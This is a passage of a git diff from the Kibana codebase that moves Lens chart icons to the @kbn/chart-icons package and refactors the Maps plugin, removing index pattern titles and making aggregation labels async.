293dd8e67db8f..362b63c46eb2d 100644 --- a/x-pack/plugins/lens/public/visualizations/xy/reference_line_helpers.tsx +++ b/x-pack/plugins/lens/public/visualizations/xy/reference_line_helpers.tsx @@ -8,6 +8,7 @@ import { groupBy, partition } from 'lodash'; import { i18n } from '@kbn/i18n'; import { Datatable } from '@kbn/expressions-plugin/public'; +import { IconChartBarReferenceLine } from '@kbn/chart-icons'; import { layerTypes } from '../../../common'; import type { DatasourceLayers, FramePublicAPI, Visualization } from '../../types'; import { groupAxesByType } from './axes_configuration'; @@ -28,7 +29,6 @@ import { isReferenceLayer, } from './visualization_helpers'; import { generateId } from '../../id_generator'; -import { LensIconChartBarReferenceLine } from '../../assets/chart_bar_reference_line'; import { defaultReferenceLineColor } from './color_assignment'; export interface ReferenceLineBase { @@ -318,7 +318,7 @@ export const getReferenceSupportedLayer = ( label: i18n.translate('xpack.lens.xyChart.addReferenceLineLayerLabel', { defaultMessage: 'Reference lines', }), - icon: LensIconChartBarReferenceLine, + icon: IconChartBarReferenceLine, disabled: !filledDataLayers.length || (!dataLayers.some(layerHasNumberHistogram) && diff --git a/x-pack/plugins/lens/public/visualizations/xy/types.ts b/x-pack/plugins/lens/public/visualizations/xy/types.ts index c2ca25c61c42e..8e140b83cb552 100644 --- a/x-pack/plugins/lens/public/visualizations/xy/types.ts +++ b/x-pack/plugins/lens/public/visualizations/xy/types.ts @@ -22,16 +22,18 @@ import type { YAxisConfig, } from '@kbn/expression-xy-plugin/common'; import { EventAnnotationConfig } from '@kbn/event-annotation-plugin/common'; -import { LensIconChartArea } from '../../assets/chart_area'; -import { LensIconChartAreaStacked } from '../../assets/chart_area_stacked'; -import { LensIconChartAreaPercentage } from '../../assets/chart_area_percentage'; -import { LensIconChartBar } from '../../assets/chart_bar'; -import { LensIconChartBarStacked } from '../../assets/chart_bar_stacked'; -import { LensIconChartBarPercentage } from '../../assets/chart_bar_percentage'; -import { LensIconChartBarHorizontal } from '../../assets/chart_bar_horizontal'; -import { LensIconChartBarHorizontalStacked } from '../../assets/chart_bar_horizontal_stacked'; -import { LensIconChartBarHorizontalPercentage } from '../../assets/chart_bar_horizontal_percentage'; -import { LensIconChartLine } from '../../assets/chart_line'; +import { + IconChartArea, + IconChartLine, + IconChartAreaStacked, + IconChartBarHorizontalStacked, + IconChartBarHorizontalPercentage, + IconChartAreaPercentage, + IconChartBar, + IconChartBarStacked, + IconChartBarPercentage, + IconChartBarHorizontal, +} from '@kbn/chart-icons'; import type { VisualizationType, Suggestion } from '../../types'; import type { ValueLabelConfig } from '../../../common/types'; @@ -168,7 +170,7 @@ const groupLabelForLineAndArea = i18n.translate('xpack.lens.xyVisualization.line export const visualizationTypes: VisualizationType[] = [ { id: 'bar', - icon: LensIconChartBar, + icon: IconChartBar, label: i18n.translate('xpack.lens.xyVisualization.barLabel', { defaultMessage: 'Bar vertical', }), @@ -177,7 +179,7 @@ export const visualizationTypes: VisualizationType[] = [ }, { id: 'bar_horizontal', - icon: LensIconChartBarHorizontal, + icon: IconChartBarHorizontal, label: i18n.translate('xpack.lens.xyVisualization.barHorizontalLabel', { defaultMessage: 'H. Bar', }), @@ -188,7 +190,7 @@ export const visualizationTypes: VisualizationType[] = [ }, { id: 'bar_stacked', - icon: LensIconChartBarStacked, + icon: IconChartBarStacked, label: i18n.translate('xpack.lens.xyVisualization.stackedBarLabel', { defaultMessage: 'Bar vertical stacked', }), @@ -196,7 +198,7 @@ export const visualizationTypes: VisualizationType[] = [ }, { id: 'bar_percentage_stacked', - icon: LensIconChartBarPercentage, + icon: IconChartBarPercentage, label: i18n.translate('xpack.lens.xyVisualization.stackedPercentageBarLabel', { defaultMessage: 'Bar vertical percentage', }), @@ -204,7 +206,7 @@ export const visualizationTypes: VisualizationType[] = [ }, { id: 'bar_horizontal_stacked', - icon: LensIconChartBarHorizontalStacked, + icon: IconChartBarHorizontalStacked, label: i18n.translate('xpack.lens.xyVisualization.stackedBarHorizontalLabel', { defaultMessage: 'H. Stacked bar', }), @@ -215,7 +217,7 @@ export const visualizationTypes: VisualizationType[] = [ }, { id: 'bar_horizontal_percentage_stacked', - icon: LensIconChartBarHorizontalPercentage, + icon: IconChartBarHorizontalPercentage, label: i18n.translate('xpack.lens.xyVisualization.stackedPercentageBarHorizontalLabel', { defaultMessage: 'H. Percentage bar', }), @@ -229,7 +231,7 @@ export const visualizationTypes: VisualizationType[] = [ }, { id: 'area', - icon: LensIconChartArea, + icon: IconChartArea, label: i18n.translate('xpack.lens.xyVisualization.areaLabel', { defaultMessage: 'Area', }), @@ -237,7 +239,7 @@ export const visualizationTypes: VisualizationType[] = [ }, { id: 'area_stacked', - icon: LensIconChartAreaStacked, + icon: IconChartAreaStacked, label: i18n.translate('xpack.lens.xyVisualization.stackedAreaLabel', { defaultMessage: 'Area stacked', }), @@ -245,7 +247,7 @@ export const visualizationTypes: VisualizationType[] = [ }, { id: 'area_percentage_stacked', - icon: LensIconChartAreaPercentage, + icon: IconChartAreaPercentage, label: i18n.translate('xpack.lens.xyVisualization.stackedPercentageAreaLabel', { defaultMessage: 'Area percentage', }), @@ -253,7 +255,7 @@ export const visualizationTypes: VisualizationType[] = [ }, { id: 'line', - icon: LensIconChartLine, + icon: IconChartLine, label: i18n.translate('xpack.lens.xyVisualization.lineLabel', { defaultMessage: 'Line', }), diff --git a/x-pack/plugins/lens/public/visualizations/xy/visualization.test.ts b/x-pack/plugins/lens/public/visualizations/xy/visualization.test.ts index b1313d765ae92..6817046864783 100644 --- a/x-pack/plugins/lens/public/visualizations/xy/visualization.test.ts +++ b/x-pack/plugins/lens/public/visualizations/xy/visualization.test.ts @@ -25,7 +25,7 @@ import type { } from './types'; import { layerTypes } from '../../../common'; import { createMockDatasource, createMockFramePublicAPI } from '../../mocks'; -import { LensIconChartBar } from '../../assets/chart_bar'; +import { IconChartBar } from '@kbn/chart-icons'; import type { VisualizeEditorLayersContext } from '@kbn/visualizations-plugin/public'; import { chartPluginMock } from '@kbn/charts-plugin/public/mocks'; import { fieldFormatsServiceMock } from '@kbn/field-formats-plugin/public/mocks'; @@ -109,7 +109,7 @@ describe('xy_visualization', () => { it('should show the preferredSeriesType if there are no layers', () => { const desc = xyVisualization.getDescription(mixedState()); - expect(desc.icon).toEqual(LensIconChartBar); + expect(desc.icon).toEqual(IconChartBar); expect(desc.label).toEqual('Bar vertical'); }); diff --git a/x-pack/plugins/lens/public/visualizations/xy/visualization_helpers.tsx b/x-pack/plugins/lens/public/visualizations/xy/visualization_helpers.tsx index c36916f7f0306..46bc1ba8dc551 100644 --- a/x-pack/plugins/lens/public/visualizations/xy/visualization_helpers.tsx +++ b/x-pack/plugins/lens/public/visualizations/xy/visualization_helpers.tsx @@ -7,6 +7,7 @@ import { i18n } from '@kbn/i18n'; import { uniq } from 'lodash'; +import { IconChartBarHorizontal, IconChartBarStacked, IconChartMixedXy } from '@kbn/chart-icons'; import { DatasourceLayers, OperationMetadata, VisualizationType } from '../../types'; import { State, @@ -20,9 +21,6 @@ import { } from './types'; import { isHorizontalChart } from './state_helpers'; import { layerTypes } from '../..'; -import { LensIconChartBarHorizontal } from '../../assets/chart_bar_horizontal'; -import { LensIconChartMixedXy } from '../../assets/chart_mixed_xy'; -import { LensIconChartBarStacked } from '../../assets/chart_bar_stacked'; import { LayerType } from '../../../common'; export function getAxisName( @@ -192,7 +190,7 @@ export function getDescription(state?: State) { if (visualizationType === 'mixed' && isHorizontalChart(state.layers)) { return { - icon: LensIconChartBarHorizontal, + icon: IconChartBarHorizontal, label: i18n.translate('xpack.lens.xyVisualization.mixedBarHorizontalLabel', { defaultMessage: 'Mixed bar horizontal', }), @@ -201,7 +199,7 @@ export function getDescription(state?: State) { if (visualizationType === 'mixed') { return { - icon: LensIconChartMixedXy, + icon: IconChartMixedXy, label: i18n.translate('xpack.lens.xyVisualization.mixedLabel', { defaultMessage: 'Mixed XY', }), @@ -214,7 +212,7 @@ export function getDescription(state?: State) { }; } -export const defaultIcon = LensIconChartBarStacked; +export const defaultIcon = IconChartBarStacked; export const defaultSeriesType = 'bar_stacked'; export const supportedDataLayer = { @@ -222,7 +220,7 @@ export const supportedDataLayer = { label: i18n.translate('xpack.lens.xyChart.addDataLayerLabel', { defaultMessage: 'Visualization', }), - icon: LensIconChartMixedXy, + icon: IconChartMixedXy, }; // i18n ids cannot be dynamically generated, hence the function below diff --git a/x-pack/plugins/lens/public/visualizations/xy/xy_config_panel/annotations_config_panel/icon_set.ts b/x-pack/plugins/lens/public/visualizations/xy/xy_config_panel/annotations_config_panel/icon_set.ts index 80cf7eccc9622..23a4b6fb52610 100644 --- a/x-pack/plugins/lens/public/visualizations/xy/xy_config_panel/annotations_config_panel/icon_set.ts +++ b/x-pack/plugins/lens/public/visualizations/xy/xy_config_panel/annotations_config_panel/icon_set.ts @@ -7,7 +7,7 @@ import { i18n } from '@kbn/i18n'; import { AvailableAnnotationIcon } from '@kbn/event-annotation-plugin/common'; -import { IconTriangle, IconCircle } from '../../../../assets/annotation_icons'; +import { IconTriangle, IconCircle } from '@kbn/chart-icons'; import { IconSet } from '../shared/icon_select'; export const annotationsIconSet: IconSet = [ diff --git a/x-pack/plugins/lens/public/visualizations/xy/xy_config_panel/axis_settings_popover.tsx b/x-pack/plugins/lens/public/visualizations/xy/xy_config_panel/axis_settings_popover.tsx index 65d7b94281486..cb02bb796a3aa 100644 --- a/x-pack/plugins/lens/public/visualizations/xy/xy_config_panel/axis_settings_popover.tsx +++ b/x-pack/plugins/lens/public/visualizations/xy/xy_config_panel/axis_settings_popover.tsx @@ -18,7 +18,13 @@ import { i18n } from '@kbn/i18n'; import { isEqual } from 'lodash'; import { AxisExtentConfig, YScaleType } from '@kbn/expression-xy-plugin/common'; import { ToolbarButtonProps } from '@kbn/kibana-react-plugin/public'; -import { XYLayerConfig, AxesSettingsConfig } from '../types'; +import { + EuiIconAxisBottom, + EuiIconAxisLeft, + EuiIconAxisRight, + EuiIconAxisTop, +} from '@kbn/chart-icons'; +import { isHorizontalChart } from '../state_helpers'; import { ToolbarPopover, useDebouncedValue, @@ -26,11 +32,7 @@ import { RangeInputField, BucketAxisBoundsControl, } from '../../../shared_components'; -import { isHorizontalChart } from '../state_helpers'; -import { EuiIconAxisBottom } from '../../../assets/axis_bottom'; -import { EuiIconAxisLeft } from '../../../assets/axis_left'; -import { EuiIconAxisRight } from '../../../assets/axis_right'; -import { EuiIconAxisTop } from '../../../assets/axis_top'; +import { XYLayerConfig, AxesSettingsConfig } from '../types'; import { validateExtent } from '../axes_configuration'; import './axis_settings_popover.scss'; diff --git a/x-pack/plugins/lens/public/visualizations/xy/xy_config_panel/layer_header.tsx b/x-pack/plugins/lens/public/visualizations/xy/xy_config_panel/layer_header.tsx index 44d9f342cfcd7..d55aa0aa12133 100644 --- a/x-pack/plugins/lens/public/visualizations/xy/xy_config_panel/layer_header.tsx +++ b/x-pack/plugins/lens/public/visualizations/xy/xy_config_panel/layer_header.tsx @@ -9,12 +9,11 @@ import React, { useState } from 'react'; import { i18n } from '@kbn/i18n'; import { EuiIcon, EuiPopover, EuiSelectable, EuiText, EuiPopoverTitle } from '@elastic/eui'; import { ToolbarButton } from '@kbn/kibana-react-plugin/public'; +import { IconChartBarReferenceLine, IconChartBarAnnotations } from '@kbn/chart-icons'; import type { VisualizationLayerWidgetProps, VisualizationType } from '../../../types'; import { State, visualizationTypes, SeriesType } from '../types'; import { isHorizontalChart, isHorizontalSeries } from '../state_helpers'; import { StaticHeader } from '../../../shared_components'; -import { LensIconChartBarReferenceLine } from '../../../assets/chart_bar_reference_line'; -import { LensIconChartBarAnnotations } from '../../../assets/chart_bar_annotations'; import { updateLayer } from '.'; import { isAnnotationsLayer, isDataLayer, isReferenceLayer } from '../visualization_helpers'; @@ -34,7 +33,7 @@ export function LayerHeader(props: VisualizationLayerWidgetProps) { function ReferenceLayerHeader() { return ( { expect(points[0].coordinates).toEqual([lon, lat]); }); - it('Should convert runtime geo_point value', () => { - const points = []; - geoPointToGeometry(`${lat},${lon}`, points); - expect(points.length).toBe(1); - expect(points[0].type).toBe('Point'); - expect(points[0].coordinates).toEqual([lon, lat]); - }); - it('Should convert array of values', () => { const lat2 = 30; const lon2 = -60; diff --git a/x-pack/plugins/maps/common/elasticsearch_util/elasticsearch_geo_utils.ts b/x-pack/plugins/maps/common/elasticsearch_util/elasticsearch_geo_utils.ts index 964a88a8b1a93..9b03be8e7f8a0 100644 --- a/x-pack/plugins/maps/common/elasticsearch_util/elasticsearch_geo_utils.ts +++ b/x-pack/plugins/maps/common/elasticsearch_util/elasticsearch_geo_utils.ts @@ -129,7 +129,7 @@ export function hitsToGeoJson( // Parse geo_point fields API response export function geoPointToGeometry( - value: Point[] | Point | string | undefined, + value: Point[] | Point | undefined, accumulator: Geometry[] ): void { if (!value) { @@ -143,19 +143,6 @@ export function geoPointToGeometry( return; } - // runtime geo_point field returns value as "lat,lon" string instead of GeoJSON - // This is a workaround for a bug - https://github.com/elastic/elasticsearch/issues/85245 - if (typeof value === 'string') { - const commaSplit = value.split(','); - const lat = parseFloat(commaSplit[0]); - const lon = parseFloat(commaSplit[1]); - accumulator.push({ - type: GEO_JSON_TYPE.POINT, - coordinates: [lon, lat], - } as Point); - return; - } - // geo_point fields API returns GeoJSON accumulator.push(value as Point); } diff --git a/x-pack/plugins/maps/common/elasticsearch_util/es_agg_utils.ts b/x-pack/plugins/maps/common/elasticsearch_util/es_agg_utils.ts index 76dafc6a6c68e..90a29a0f72ee2 100644 --- a/x-pack/plugins/maps/common/elasticsearch_util/es_agg_utils.ts +++ b/x-pack/plugins/maps/common/elasticsearch_util/es_agg_utils.ts @@ -18,8 +18,8 @@ export function getField(indexPattern: DataView, fieldName: string): DataViewFie if (!field) { throw new Error( i18n.translate('xpack.maps.source.esSearch.fieldNotFoundMsg', { - defaultMessage: `Unable to find '{fieldName}' in index-pattern '{indexPatternTitle}'.`, - values: { fieldName, indexPatternTitle: indexPattern.title }, + defaultMessage: `Unable to find '{fieldName}' in index-pattern '{indexPatternName}'.`, + values: { fieldName, indexPatternName: indexPattern.getName() }, }) ); } diff --git a/x-pack/plugins/maps/public/actions/map_action_constants.ts b/x-pack/plugins/maps/public/actions/map_action_constants.ts index 62fed40a4171c..aabca948ec80a 100644 --- a/x-pack/plugins/maps/public/actions/map_action_constants.ts +++ b/x-pack/plugins/maps/public/actions/map_action_constants.ts @@ -30,6 +30,7 @@ export const SET_LAYER_STYLE_META = 'SET_LAYER_STYLE_META'; export const UPDATE_SOURCE_PROP = 'UPDATE_SOURCE_PROP'; export const SET_MOUSE_COORDINATES = 'SET_MOUSE_COORDINATES'; export const CLEAR_MOUSE_COORDINATES = 'CLEAR_MOUSE_COORDINATES'; +export const SET_EMBEDDABLE_SEARCH_CONTEXT = 'SET_EMBEDDABLE_SEARCH_CONTEXT'; export const SET_GOTO = 'SET_GOTO'; export const CLEAR_GOTO = 'CLEAR_GOTO'; export const TRACK_CURRENT_LAYER_STATE = 'TRACK_CURRENT_LAYER_STATE'; diff --git a/x-pack/plugins/maps/public/actions/map_actions.ts b/x-pack/plugins/maps/public/actions/map_actions.ts index f21f09a6cff3b..f122d664ecf66 100644 --- a/x-pack/plugins/maps/public/actions/map_actions.ts +++ b/x-pack/plugins/maps/public/actions/map_actions.ts @@ -43,6 +43,7 @@ import { MAP_EXTENT_CHANGED, MAP_READY, ROLLBACK_MAP_SETTINGS, + SET_EMBEDDABLE_SEARCH_CONTEXT, SET_GOTO, SET_MAP_INIT_ERROR, SET_MAP_SETTINGS, @@ -340,6 +341,19 @@ export function setQuery({ }; } +export function setEmbeddableSearchContext({ + query, + filters, +}: { + filters: Filter[]; + query?: Query; +}) { + return { + type: SET_EMBEDDABLE_SEARCH_CONTEXT, + embeddableSearchContext: { filters, query }, + }; +} + export function updateDrawState(drawState: DrawState | null) { return (dispatch: Dispatch) => { if (drawState !== null) { diff --git a/x-pack/plugins/maps/public/classes/fields/agg/agg_field.ts b/x-pack/plugins/maps/public/classes/fields/agg/agg_field.ts index 869c69229ebf1..1a6841ffa9e7e 100644 --- a/x-pack/plugins/maps/public/classes/fields/agg/agg_field.ts +++ b/x-pack/plugins/maps/public/classes/fields/agg/agg_field.ts @@ -83,7 +83,7 @@ export class AggField extends CountAggField { async getLabel(): Promise { return this._label ? this._label - : this._source.getAggLabel( + : await this._source.getAggLabel( this._aggType, this._esDocField ? await this._esDocField.getLabel() : '' ); diff --git a/x-pack/plugins/maps/public/classes/fields/agg/count_agg_field.ts b/x-pack/plugins/maps/public/classes/fields/agg/count_agg_field.ts index 16f7a7d09d28f..03ade37c3dbec 100644 --- a/x-pack/plugins/maps/public/classes/fields/agg/count_agg_field.ts +++ b/x-pack/plugins/maps/public/classes/fields/agg/count_agg_field.ts @@ -66,7 +66,7 @@ export class CountAggField implements IESAggField { } async getLabel(): Promise { - return this._label ? this._label : this._source.getAggLabel(AGG_TYPE.COUNT, ''); + return this._label ? this._label : await this._source.getAggLabel(AGG_TYPE.COUNT, ''); } isValid(): boolean { diff --git a/x-pack/plugins/maps/public/classes/fields/agg/percentile_agg_field.test.ts b/x-pack/plugins/maps/public/classes/fields/agg/percentile_agg_field.test.ts index 4566cf4a73f1c..3b6eff3313077 100644 --- a/x-pack/plugins/maps/public/classes/fields/agg/percentile_agg_field.test.ts +++ b/x-pack/plugins/maps/public/classes/fields/agg/percentile_agg_field.test.ts @@ -32,7 +32,7 @@ const mockEsAggSource = { getAggKey: (aggType: AGG_TYPE, fieldName: string) => { return 'agg_key'; }, - getAggLabel: (aggType: AGG_TYPE, fieldName: string) => { + getAggLabel: async (aggType: AGG_TYPE, fieldName: string) => { return 'agg_label'; }, getIndexPattern: async () => { diff --git a/x-pack/plugins/maps/public/classes/fields/agg/percentile_agg_field.ts b/x-pack/plugins/maps/public/classes/fields/agg/percentile_agg_field.ts index bc542bf891517..57dcd5631918c 100644 --- a/x-pack/plugins/maps/public/classes/fields/agg/percentile_agg_field.ts +++ b/x-pack/plugins/maps/public/classes/fields/agg/percentile_agg_field.ts @@ -57,7 +57,7 @@ export class PercentileAggField extends AggField implements IESAggField { } const suffix = getOrdinalSuffix(this._percentile); - return `${this._percentile}${suffix} ${this._source.getAggLabel( + return `${this._percentile}${suffix} ${await this._source.getAggLabel( this._getAggType(), this.getRootName() )}`; diff --git a/x-pack/plugins/maps/public/classes/joins/inner_join.test.js b/x-pack/plugins/maps/public/classes/joins/inner_join.test.js index 4e273f95515e4..f8ca092e9a164 100644 --- a/x-pack/plugins/maps/public/classes/joins/inner_join.test.js +++ b/x-pack/plugins/maps/public/classes/joins/inner_join.test.js @@ -15,7 +15,6 @@ const rightSource = { type: SOURCE_TYPES.ES_TERM_SOURCE, id: 'd3625663-5b34-4d50-a784-0d743f676a0c', indexPatternId: '90943e30-9a47-11e8-b64d-95841ca0b247', - indexPatternTitle: 'kibana_sample_data_logs', term: 'geo.dest', metrics: [{ type: 'count' }], }; diff --git a/x-pack/plugins/maps/public/classes/layers/create_region_map_layer_descriptor.ts b/x-pack/plugins/maps/public/classes/layers/create_region_map_layer_descriptor.ts index 19d9567a3480a..e88cbaa0d6d87 100644 --- a/x-pack/plugins/maps/public/classes/layers/create_region_map_layer_descriptor.ts +++ b/x-pack/plugins/maps/public/classes/layers/create_region_map_layer_descriptor.ts @@ -37,7 +37,6 @@ export interface CreateRegionMapLayerDescriptorParams { termsSize?: number; colorSchema: string; indexPatternId?: string; - indexPatternTitle?: string; metricAgg: string; metricFieldName?: string; } @@ -65,7 +64,6 @@ export function createRegionMapLayerDescriptor({ termsSize, colorSchema, indexPatternId, - indexPatternTitle, metricAgg, metricFieldName, }: CreateRegionMapLayerDescriptorParams): LayerDescriptor | null { @@ -87,7 +85,6 @@ export function createRegionMapLayerDescriptor({ type: SOURCE_TYPES.ES_TERM_SOURCE, id: joinId, indexPatternId, - indexPatternTitle: indexPatternTitle ? indexPatternTitle : indexPatternId, term: termsFieldName, metrics: [metricsDescriptor], applyGlobalQuery: true, diff --git a/x-pack/plugins/maps/public/classes/layers/vector_layer/bounds_data.ts b/x-pack/plugins/maps/public/classes/layers/vector_layer/bounds_data.ts index 7136c9d0c2235..d7382782d1af7 100644 --- a/x-pack/plugins/maps/public/classes/layers/vector_layer/bounds_data.ts +++ b/x-pack/plugins/maps/public/classes/layers/vector_layer/bounds_data.ts @@ -39,6 +39,7 @@ export async function syncBoundsData({ query: dataFilters.query, timeFilters: dataFilters.timeFilters, timeslice: dataFilters.timeslice, + embeddableSearchContext: dataFilters.embeddableSearchContext, filters: dataFilters.filters, joinKeyFilter: dataFilters.joinKeyFilter, applyGlobalQuery: source.getApplyGlobalQuery(), diff --git a/x-pack/plugins/maps/public/classes/layers/vector_layer/vector_layer.test.tsx b/x-pack/plugins/maps/public/classes/layers/vector_layer/vector_layer.test.tsx index 5b91e5e49c514..b71fef484de01 100644 --- a/x-pack/plugins/maps/public/classes/layers/vector_layer/vector_layer.test.tsx +++ b/x-pack/plugins/maps/public/classes/layers/vector_layer/vector_layer.test.tsx @@ -72,7 +72,6 @@ describe('cloneDescriptor', () => { right: { id: '557d0f15', indexPatternId: 'myIndexPattern', - indexPatternTitle: 'logs-*', metrics: [{ type: AGG_TYPE.COUNT }], term: 'myTermField', type: SOURCE_TYPES.ES_TERM_SOURCE, @@ -114,7 +113,6 @@ describe('cloneDescriptor', () => { right: { id: '557d0f15', indexPatternId: 'myIndexPattern', - indexPatternTitle: 'logs-*', term: 'myTermField', type: 'joinSource', } as unknown as ESTermSourceDescriptor, diff --git a/x-pack/plugins/maps/public/classes/layers/wizards/choropleth_layer_wizard/create_choropleth_layer_descriptor.ts b/x-pack/plugins/maps/public/classes/layers/wizards/choropleth_layer_wizard/create_choropleth_layer_descriptor.ts index 36e07d7383d18..2cbf6d3000b9a 100644 --- a/x-pack/plugins/maps/public/classes/layers/wizards/choropleth_layer_wizard/create_choropleth_layer_descriptor.ts +++ b/x-pack/plugins/maps/public/classes/layers/wizards/choropleth_layer_wizard/create_choropleth_layer_descriptor.ts @@ -38,14 +38,12 @@ function createChoroplethLayerDescriptor({ sourceDescriptor, leftField, rightIndexPatternId, - rightIndexPatternTitle, rightTermField, layerType, }: { sourceDescriptor: EMSFileSourceDescriptor | ESSearchSourceDescriptor; leftField: string; rightIndexPatternId: string; - rightIndexPatternTitle: string; rightTermField: string; layerType: LAYER_TYPE.GEOJSON_VECTOR | LAYER_TYPE.MVT_VECTOR; }) { @@ -98,7 +96,6 @@ function createChoroplethLayerDescriptor({ type: SOURCE_TYPES.ES_TERM_SOURCE, id: joinId, indexPatternId: rightIndexPatternId, - indexPatternTitle: rightIndexPatternTitle, term: rightTermField, metrics: [metricsDescriptor], applyGlobalQuery: true, @@ -125,13 +122,11 @@ export function createEmsChoroplethLayerDescriptor({ leftEmsFileId, leftEmsField, rightIndexPatternId, - rightIndexPatternTitle, rightTermField, }: { leftEmsFileId: string; leftEmsField: string; rightIndexPatternId: string; - rightIndexPatternTitle: string; rightTermField: string; }) { return createChoroplethLayerDescriptor({ @@ -141,7 +136,6 @@ export function createEmsChoroplethLayerDescriptor({ }), leftField: leftEmsField, rightIndexPatternId, - rightIndexPatternTitle, rightTermField, layerType: LAYER_TYPE.GEOJSON_VECTOR, }); @@ -152,14 +146,12 @@ export function createEsChoroplethLayerDescriptor({ leftGeoField, leftJoinField, rightIndexPatternId, - rightIndexPatternTitle, rightTermField, }: { leftIndexPatternId: string; leftGeoField: string; leftJoinField: string; rightIndexPatternId: string; - rightIndexPatternTitle: string; rightTermField: string; }) { return createChoroplethLayerDescriptor({ @@ -174,7 +166,6 @@ export function createEsChoroplethLayerDescriptor({ }), leftField: leftJoinField, rightIndexPatternId, - rightIndexPatternTitle, rightTermField, layerType: LAYER_TYPE.MVT_VECTOR, }); diff --git a/x-pack/plugins/maps/public/classes/layers/wizards/choropleth_layer_wizard/layer_template.tsx b/x-pack/plugins/maps/public/classes/layers/wizards/choropleth_layer_wizard/layer_template.tsx index 4edf85bc922d1..5fef8dd28ceb1 100644 --- a/x-pack/plugins/maps/public/classes/layers/wizards/choropleth_layer_wizard/layer_template.tsx +++ b/x-pack/plugins/maps/public/classes/layers/wizards/choropleth_layer_wizard/layer_template.tsx @@ -66,7 +66,6 @@ interface State { leftEmsJoinField: string | null; leftElasticsearchJoinField: string | null; rightIndexPatternId: string; - rightIndexPatternTitle: string | null; rightTermsFields: DataViewField[]; rightJoinField: string | null; } @@ -85,7 +84,6 @@ export class LayerTemplate extends Component { leftEmsJoinField: null, leftElasticsearchJoinField: null, rightIndexPatternId: '', - rightIndexPatternTitle: null, rightTermsFields: [], rightJoinField: null, }; @@ -99,7 +97,7 @@ export class LayerTemplate extends Component { } _loadRightFields = async (indexPatternId: string) => { - this.setState({ rightTermsFields: [], rightIndexPatternTitle: null }); + this.setState({ rightTermsFields: [] }); let indexPattern; try { @@ -116,7 +114,6 @@ export class LayerTemplate extends Component { this.setState({ rightTermsFields: getTermsFields(indexPattern.fields), - rightIndexPatternTitle: indexPattern.title, }); }; @@ -265,14 +262,12 @@ export class LayerTemplate extends Component { leftGeoField: this.state.leftGeoField!, leftJoinField: this.state.leftElasticsearchJoinField!, rightIndexPatternId: this.state.rightIndexPatternId, - rightIndexPatternTitle: this.state.rightIndexPatternTitle!, rightTermField: this.state.rightJoinField!, }) : createEmsChoroplethLayerDescriptor({ leftEmsFileId: this.state.leftEmsFileId!, leftEmsField: this.state.leftEmsJoinField!, rightIndexPatternId: this.state.rightIndexPatternId, - rightIndexPatternTitle: this.state.rightIndexPatternTitle!, rightTermField: this.state.rightJoinField!, }); diff --git a/x-pack/plugins/maps/public/classes/layers/wizards/solution_layers/observability/create_layer_descriptor.test.ts b/x-pack/plugins/maps/public/classes/layers/wizards/solution_layers/observability/create_layer_descriptor.test.ts index 771cf55ec25d3..7aaea96a06aed 100644 --- a/x-pack/plugins/maps/public/classes/layers/wizards/solution_layers/observability/create_layer_descriptor.test.ts +++ b/x-pack/plugins/maps/public/classes/layers/wizards/solution_layers/observability/create_layer_descriptor.test.ts @@ -55,7 +55,6 @@ describe('createLayerDescriptor', () => { applyGlobalTime: true, id: '12345', indexPatternId: 'apm_static_index_pattern_id', - indexPatternTitle: 'traces-apm*,logs-apm*,metrics-apm*,apm-*', metrics: [ { field: 'transaction.duration.us', diff --git a/x-pack/plugins/maps/public/classes/layers/wizards/solution_layers/observability/create_layer_descriptor.ts b/x-pack/plugins/maps/public/classes/layers/wizards/solution_layers/observability/create_layer_descriptor.ts index 26a9f14b8160f..b8536d8970939 100644 --- a/x-pack/plugins/maps/public/classes/layers/wizards/solution_layers/observability/create_layer_descriptor.ts +++ b/x-pack/plugins/maps/public/classes/layers/wizards/solution_layers/observability/create_layer_descriptor.ts @@ -173,7 +173,6 @@ export function createLayerDescriptor({ type: SOURCE_TYPES.ES_TERM_SOURCE, id: joinId, indexPatternId: APM_INDEX_PATTERN_ID, - indexPatternTitle: APM_INDEX_PATTERN_TITLE, // TODO look up from APM_OSS.indexPattern term: 'client.geo.country_iso_code', metrics: [metricsDescriptor], whereQuery: apmSourceQuery, diff --git a/x-pack/plugins/maps/public/classes/sources/es_agg_source/es_agg_source.ts b/x-pack/plugins/maps/public/classes/sources/es_agg_source/es_agg_source.ts index fce9293cf9f02..42b9c0ed73c77 100644 --- a/x-pack/plugins/maps/public/classes/sources/es_agg_source/es_agg_source.ts +++ b/x-pack/plugins/maps/public/classes/sources/es_agg_source/es_agg_source.ts @@ -21,7 +21,7 @@ export const DEFAULT_METRIC = { type: AGG_TYPE.COUNT }; export interface IESAggSource extends IESSource { getAggKey(aggType: AGG_TYPE, fieldName: string): string; - getAggLabel(aggType: AGG_TYPE, fieldLabel: string): string; + getAggLabel(aggType: AGG_TYPE, fieldLabel: string): Promise; getMetricFields(): IESAggField[]; getMetricFieldForName(fieldName: string): IESAggField | null; getValueAggsDsl(indexPattern: DataView): { [key: string]: unknown }; @@ -88,7 +88,7 @@ export abstract class AbstractESAggSource extends AbstractESSource implements IE }); } - getAggLabel(aggType: AGG_TYPE, fieldLabel: string): string { + async getAggLabel(aggType: AGG_TYPE, fieldLabel: string): Promise { switch (aggType) { case AGG_TYPE.COUNT: return COUNT_PROP_LABEL; diff --git a/x-pack/plugins/maps/public/classes/sources/es_geo_grid_source/es_geo_grid_source.tsx b/x-pack/plugins/maps/public/classes/sources/es_geo_grid_source/es_geo_grid_source.tsx index 37b764bf6dbdc..b0a230bebc3cd 100644 --- a/x-pack/plugins/maps/public/classes/sources/es_geo_grid_source/es_geo_grid_source.tsx +++ b/x-pack/plugins/maps/public/classes/sources/es_geo_grid_source/es_geo_grid_source.tsx @@ -142,14 +142,6 @@ export class ESGeoGridSource extends AbstractESAggSource implements IMvtVectorSo } async getImmutableProperties(): Promise { - let indexPatternName = this.getIndexPatternId(); - try { - const indexPattern = await this.getIndexPattern(); - indexPatternName = indexPattern.title; - } catch (error) { - // ignore error, title will just default to id - } - return [ { label: getDataSourceLabel(), @@ -157,7 +149,7 @@ export class ESGeoGridSource extends AbstractESAggSource implements IMvtVectorSo }, { label: getDataViewLabel(), - value: indexPatternName, + value: await this.getDisplayName(), }, { label: i18n.translate('xpack.maps.source.esGrid.geospatialFieldLabel', { diff --git a/x-pack/plugins/maps/public/classes/sources/es_geo_line_source/es_geo_line_source.tsx b/x-pack/plugins/maps/public/classes/sources/es_geo_line_source/es_geo_line_source.tsx index 4bb23cfb7e55b..78aae064a6555 100644 --- a/x-pack/plugins/maps/public/classes/sources/es_geo_line_source/es_geo_line_source.tsx +++ b/x-pack/plugins/maps/public/classes/sources/es_geo_line_source/es_geo_line_source.tsx @@ -109,14 